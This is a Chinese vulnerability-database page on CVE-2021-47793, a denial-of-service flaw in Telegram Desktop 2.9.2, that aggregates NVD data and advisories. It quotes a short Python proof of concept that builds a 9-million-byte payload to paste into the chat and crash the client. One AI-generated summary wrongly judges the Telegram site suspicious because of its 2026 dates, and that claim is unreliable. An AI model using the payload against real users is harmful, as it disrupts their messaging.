支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2021-47793 基础信息
漏洞信息
                                        # Telegram Desktop 2.9.2 DoS 漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Telegram Desktop 2.9.2 - Denial of Service (PoC)
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Telegram Desktop 2.9.2 contains a denial of service vulnerability that allows attackers to crash the application by sending an oversized message payload. Attackers can generate a 9 million byte buffer and paste it into the messaging interface to trigger an application crash.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
来源:美国国家漏洞数据库 NVD
漏洞类别
不加限制或调节的资源分配
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2021-47793 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2021-47793 的情报信息
  • 标题: Telegram Desktop 2.9.2 - Denial of Service (PoC) - Windows dos Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ### 漏洞关键信息
    
    - **漏洞标题**: Telegram Desktop 2.9.2 - Denial of Service (PoC)
    - **EDB-ID**: 50247
    - **CVE**: N/A
    - **作者**:ARYAN CHEHREGHANI
    - **类型**: DOS
    - **平台**: WINDOWS
    - **日期**: 2021-09-01
    - **漏洞应用**: Telegram Desktop
    - **测试版本**: 2.9.2 x64
    - **测试操作系统**: Windows 10 Enterprise
    
    ### 漏洞描述
    
    Telegram是一款注重速度和安全的通讯应用,具有全球5亿多用户。此漏洞为针对Telegram Desktop 2.9.2版本的拒绝服务攻击,可导致服务中断。
    
    ### 漏洞代码
    
    ```python
    #!/usr/bin/env python
    buffer = "\x41" * 9000000
    try:
        f = open("output.txt", "w")
        print("[!] Creating %s bytes DOS payload..." % len(buffer))
        f.write(buffer)
        f.close()
        print("[!] File Created !")
    except:
        print("File cannot be created")
    ```
    
    ### 其他信息
    
    - **供应商主页**: [https://telegram.org](https://telegram.org)
    - **软件下载链接**: [https://telegram.org/dl/desktop/win64](https://telegram.org/dl/desktop/win64)
    - **漏洞发布者/来源**: [Link](Link)
                                            
    Telegram Desktop 2.9.2 - Denial of Service (PoC) - Windows dos Exploit
  • 标题: Telegram Messenger -- 🔗来源链接

    标签:product

    神龙速读:
                                            ### 关键漏洞信息
    
    - **最新更新内容**:2026年1月3日的更新引入了AI摘要功能和新的设计,这些可能涉及AI相关的新漏洞风险。
    - **操作系统覆盖范围**:Telegram支持多种操作系统和设备(Android, iPhone/iPad, PC/Linux, macOS),说明其广泛的用户基础,可能带来更多潜在的跨平台漏洞。
    - **图片显示了该截图可能为伪造**:现实中 Telegram 不可能在 2025/2026 年更新,故显示网站可疑。
                                            
    Telegram Messenger
  • 标题: Telegram Desktop 2.9.2 - Denial of Service | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ## 关键信息
    
    - **漏洞名称**: Telegram Desktop 2.9.2 - Denial of Service
    - **严重程度**: Medium
    - **日期**: January 15, 2026
    - **影响软件**: Telegram Desktop 2.9.2
    - **CVE编号**: CVE-2021-47793
    - **CVSS评分**: 4.0
    - **CVSS向量**: AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
    - **相关链接**:
      - [ExploitDB-50247](#)
      - [官方Telegram主页](#)
    - **报告人**: Aryan Chehreghani
    - **描述**: Telegram Desktop 2.9.2包含一个拒绝服务漏洞,允许攻击者通过发送超大消息负载来使应用程序崩溃。攻击者可以生成一个9兆字节的缓冲区并将其粘贴到消息界面以触发应用程序崩溃。
                                            
    Telegram Desktop 2.9.2 - Denial of Service | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2021-47793
四、漏洞 CVE-2021-47793 的评论

暂无评论


发表评论